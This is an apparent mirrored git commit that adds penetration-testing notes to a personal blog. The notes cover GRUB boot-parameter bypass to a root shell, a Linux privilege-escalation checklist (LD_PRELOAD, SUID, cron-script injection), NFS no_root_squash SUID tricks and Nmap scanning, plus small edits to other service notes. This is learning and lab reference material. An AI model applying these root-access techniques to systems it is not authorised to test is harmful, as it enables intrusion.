mirror of
https://github.com/anotherhadi/blog.git
synced 2026-07-06 16:52:33 +02:00
new notes
Signed-off-by: Hadi <112569860+anotherhadi@users.noreply.github.com>
This commit is contained in:
@@ -0,0 +1,67 @@
|
||||
---
|
||||
title: "GRUB Boot Bypass"
|
||||
description: "Physical access techniques to get a root shell by editing GRUB boot parameters."
|
||||
tags: ["linux", "grub", "physical-access", "privesc"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
When GRUB is not password-protected, anyone with physical access can edit boot parameters and bypass authentication entirely.
|
||||
|
||||
At the GRUB menu, press **`e`** to edit the selected entry. Modify the line starting with `linux`, then press **`F10`** to boot.
|
||||
|
||||
## Techniques
|
||||
|
||||
### init=/bin/sh
|
||||
|
||||
Replaces the init process with a shell; drops directly into a root shell before any login prompt.
|
||||
|
||||
```
|
||||
linux ... init=/bin/sh
|
||||
```
|
||||
|
||||
Filesystem is mounted read-only by default. Remount to make changes:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /
|
||||
```
|
||||
|
||||
### init=/bin/bash
|
||||
|
||||
Same as above but uses bash. Add `rw` on the `linux` line to mount read-write from the start:
|
||||
|
||||
```
|
||||
linux ... rw init=/bin/bash
|
||||
```
|
||||
|
||||
### rd.break (systemd)
|
||||
|
||||
Interrupts the boot process in the initramfs, before the real root filesystem is mounted. Useful for resetting the root password.
|
||||
|
||||
```
|
||||
linux ... rd.break
|
||||
```
|
||||
|
||||
From the initramfs shell:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /sysroot
|
||||
chroot /sysroot
|
||||
passwd root
|
||||
exit
|
||||
```
|
||||
|
||||
### single (single-user mode)
|
||||
|
||||
Boots into maintenance mode. On some distros this drops to a root shell without a password prompt (not Debian/Ubuntu).
|
||||
|
||||
```
|
||||
linux ... single
|
||||
```
|
||||
|
||||
### systemd.unit=rescue.target
|
||||
|
||||
systemd equivalent of single-user mode: minimal services, root shell.
|
||||
|
||||
```
|
||||
linux ... systemd.unit=rescue.target
|
||||
```
|
||||
@@ -0,0 +1,80 @@
|
||||
---
|
||||
title: "Linux Privilege Escalation"
|
||||
description: "Common misconfigurations and weaknesses to check when escalating privileges on Linux."
|
||||
tags: ["linux", "privesc", "post-exploitation"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
## Sudo
|
||||
|
||||
```bash
|
||||
sudo -l
|
||||
```
|
||||
|
||||
Check [GTFOBins](https://gtfobins.github.io) for any listed binary.
|
||||
|
||||
If `env_keep+=LD_PRELOAD` is set:
|
||||
|
||||
```bash
|
||||
# compile a shared lib that spawns a shell
|
||||
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
|
||||
sudo LD_PRELOAD=/tmp/shell.so <allowed_binary>
|
||||
```
|
||||
|
||||
## SUID / SGID
|
||||
|
||||
```bash
|
||||
find / -user root -perm -4000 -ls 2>/dev/null # SUID
|
||||
find / -group root -perm -2000 -ls 2>/dev/null # SGID
|
||||
```
|
||||
|
||||
Check any non-standard binary on GTFOBins.
|
||||
|
||||
## Misconfiguration
|
||||
|
||||
```bash
|
||||
# World-writable directories
|
||||
find / -type d -perm -2 -ls 2>/dev/null
|
||||
|
||||
# World-writable files owned by root
|
||||
find / -user root -perm -2 ! -type l -ls 2>/dev/null
|
||||
```
|
||||
|
||||
## Cron Jobs
|
||||
|
||||
```bash
|
||||
cat /etc/crontab
|
||||
ls -la /etc/cron.*
|
||||
crontab -l
|
||||
```
|
||||
|
||||
If a cron runs a script you can write to, replace its content:
|
||||
|
||||
```bash
|
||||
echo 'chmod +s /bin/bash' >> /path/to/script.sh
|
||||
```
|
||||
|
||||
If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in `$PATH`.
|
||||
|
||||
## Capabilities
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
Dangerous capabilities: `cap_setuid`, `cap_net_raw`, `cap_dac_override`.
|
||||
Check [GTFOBins](https://gtfobins.github.io) for exploitation.
|
||||
|
||||
## Kernel Exploits
|
||||
|
||||
```bash
|
||||
uname -r
|
||||
searchsploit linux kernel $(uname -r)
|
||||
```
|
||||
|
||||
## LinPEAS / WinPEAS
|
||||
|
||||
Automated enumeration scripts to surface privesc vectors quickly.
|
||||
|
||||
- [LinPEAS (linux)](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
|
||||
- [WinPEAS (windows)](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS)
|
||||
@@ -5,8 +5,6 @@ tags: ["ftp", "network", "service"]
|
||||
publishDate: 2026-04-29
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive).
|
||||
Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP.
|
||||
|
||||
|
||||
@@ -0,0 +1,79 @@
|
||||
---
|
||||
title: "NFS"
|
||||
description: "Enumeration, mounting and privilege escalation techniques for NFS shares."
|
||||
tags: ["nfs", "network", "service"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network.
|
||||
Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 111,2049 $IP
|
||||
nmap -p 111,2049 --script nfs-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `nfs-showmount`: lists exported shares
|
||||
- `nfs-ls`: lists files in shares
|
||||
- `nfs-statfs`: retrieves disk stats
|
||||
|
||||
### List shares
|
||||
|
||||
```bash
|
||||
showmount -e $IP
|
||||
rpcinfo -p $IP
|
||||
```
|
||||
|
||||
## Mount
|
||||
|
||||
```bash
|
||||
mkdir /mnt/nfs
|
||||
mount -t nfs $IP:/share /mnt/nfs
|
||||
mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2
|
||||
umount /mnt/nfs
|
||||
```
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### no_root_squash
|
||||
|
||||
If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share.
|
||||
|
||||
Check `/etc/exports` on the server (if readable):
|
||||
|
||||
```bash
|
||||
cat /etc/exports
|
||||
```
|
||||
|
||||
Look for:
|
||||
|
||||
```
|
||||
/share *(rw,no_root_squash)
|
||||
```
|
||||
|
||||
If present, copy a SUID binary onto the share as root from your attacker machine:
|
||||
|
||||
```bash
|
||||
cp /bin/bash /mnt/nfs/bash
|
||||
chmod +s /mnt/nfs/bash
|
||||
```
|
||||
|
||||
Then execute it on the target with `-p` to keep the SUID effective UID:
|
||||
|
||||
```bash
|
||||
/tmp/nfs/bash -p
|
||||
```
|
||||
|
||||
### UID spoofing
|
||||
|
||||
NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly:
|
||||
|
||||
```bash
|
||||
python3 -c "import os; os.setuid(1001); os.system('/bin/bash')"
|
||||
```
|
||||
@@ -0,0 +1,108 @@
|
||||
---
|
||||
title: "Nmap"
|
||||
description: "Host discovery, port scanning, service detection and NSE scripting"
|
||||
tags: ["nmap", "network", "enumeration"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE.
|
||||
|
||||
## Host Discovery
|
||||
|
||||
```bash
|
||||
nmap -sn 192.168.1.0/24 # ping sweep, no port scan
|
||||
nmap -sn -PR 192.168.1.0/24 # ARP ping (local network)
|
||||
nmap -Pn $IP # skip host discovery, treat as up
|
||||
```
|
||||
|
||||
## Port Scanning
|
||||
|
||||
```bash
|
||||
nmap $IP # top 1000 ports (SYN scan if root)
|
||||
nmap -p 80,443,8080 $IP # specific ports
|
||||
nmap -p 1-65535 $IP # all ports
|
||||
nmap -p- $IP # shorthand for all ports
|
||||
nmap -sU $IP # UDP scan
|
||||
nmap -sU -sS $IP # UDP + SYN together
|
||||
```
|
||||
|
||||
Scan types:
|
||||
|
||||
- `-sS`: SYN scan (stealth, requires root)
|
||||
- `-sT`: TCP connect scan (no root needed)
|
||||
- `-sU`: UDP scan
|
||||
- `-sA`: ACK scan (firewall rule mapping)
|
||||
- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows)
|
||||
|
||||
## Service & Version Detection
|
||||
|
||||
```bash
|
||||
nmap -sV $IP
|
||||
nmap -sV --version-intensity 9 $IP # more aggressive probing
|
||||
```
|
||||
|
||||
## OS Detection
|
||||
|
||||
```bash
|
||||
nmap -O $IP
|
||||
nmap -O --osscan-guess $IP # guess if not confident
|
||||
```
|
||||
|
||||
## Aggressive Scan
|
||||
|
||||
```bash
|
||||
nmap -A $IP # -sV -O --script=default --traceroute
|
||||
```
|
||||
|
||||
## Timing Templates
|
||||
|
||||
```bash
|
||||
nmap -T0 $IP # paranoid (IDS evasion, very slow)
|
||||
nmap -T1 $IP # sneaky
|
||||
nmap -T3 $IP # normal (default)
|
||||
nmap -T4 $IP # aggressive (faster, good for CTFs)
|
||||
nmap -T5 $IP # insane (may miss results)
|
||||
```
|
||||
|
||||
## NSE Scripts
|
||||
|
||||
```bash
|
||||
nmap --script default $IP
|
||||
nmap --script vuln $IP
|
||||
nmap --script "ftp-*" $IP
|
||||
nmap --script safe $IP
|
||||
nmap --script $script --script-args user=$user,pass=$password $IP
|
||||
```
|
||||
|
||||
Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`.
|
||||
|
||||
Scripts are located in `/usr/share/nmap/scripts/`.
|
||||
|
||||
## Output Formats
|
||||
|
||||
```bash
|
||||
nmap -oN output.txt $IP # normal
|
||||
nmap -oX output.xml $IP # XML
|
||||
nmap -oG output.gnmap $IP # grepable
|
||||
nmap -oA output $IP # all three at once
|
||||
```
|
||||
|
||||
## Common Profiles
|
||||
|
||||
Quick full scan:
|
||||
|
||||
```bash
|
||||
nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP
|
||||
```
|
||||
|
||||
CTF/lab initial recon:
|
||||
|
||||
```bash
|
||||
nmap -sV -sC -p- --open $IP
|
||||
```
|
||||
|
||||
UDP top ports:
|
||||
|
||||
```bash
|
||||
nmap -sU --top-ports 100 $IP
|
||||
```
|
||||
@@ -5,8 +5,6 @@ tags: ["rdp", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
|
||||
Common on Windows servers and workstations.
|
||||
|
||||
|
||||
@@ -5,8 +5,6 @@ tags: ["ssh", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
SSH runs on **port 22** and provides an encrypted remote shell.
|
||||
Common implementations: OpenSSH, Dropbear, Bitvise.
|
||||
|
||||
|
||||
@@ -5,8 +5,6 @@ tags: ["telnet", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**.
|
||||
Common on embedded devices, legacy systems, routers, and IoT equipment.
|
||||
|
||||
|
||||
@@ -32,7 +32,7 @@ If the page has been taken down or modified, the cached version may still show t
|
||||
|
||||
## Domain History
|
||||
|
||||
[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domain — useful when a site has moved or been taken down.
|
||||
[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domaint useful when a site has moved or been taken down.
|
||||
|
||||
[ViewDNS.info](https://viewdns.info) covers WHOIS history, reverse IP, reverse MX, and port scans from a single interface.
|
||||
|
||||
|
||||
@@ -44,9 +44,9 @@ tweet_id = 1234567890123456789
|
||||
timestamp_ms = (tweet_id >> 22) + 1288834974657
|
||||
```
|
||||
|
||||
`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs — useful to confirm account creation date without needing profile metadata.
|
||||
`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs: useful to confirm account creation date without needing profile metadata.
|
||||
|
||||
Several online converters exist if you don't want to do it manually — search "snowflake id decoder".
|
||||
Several online converters exist if you don't want to do it manually: search "snowflake id decoder".
|
||||
|
||||
### Direct profile URL by ID
|
||||
|
||||
|
||||
Reference in New Issue
Block a user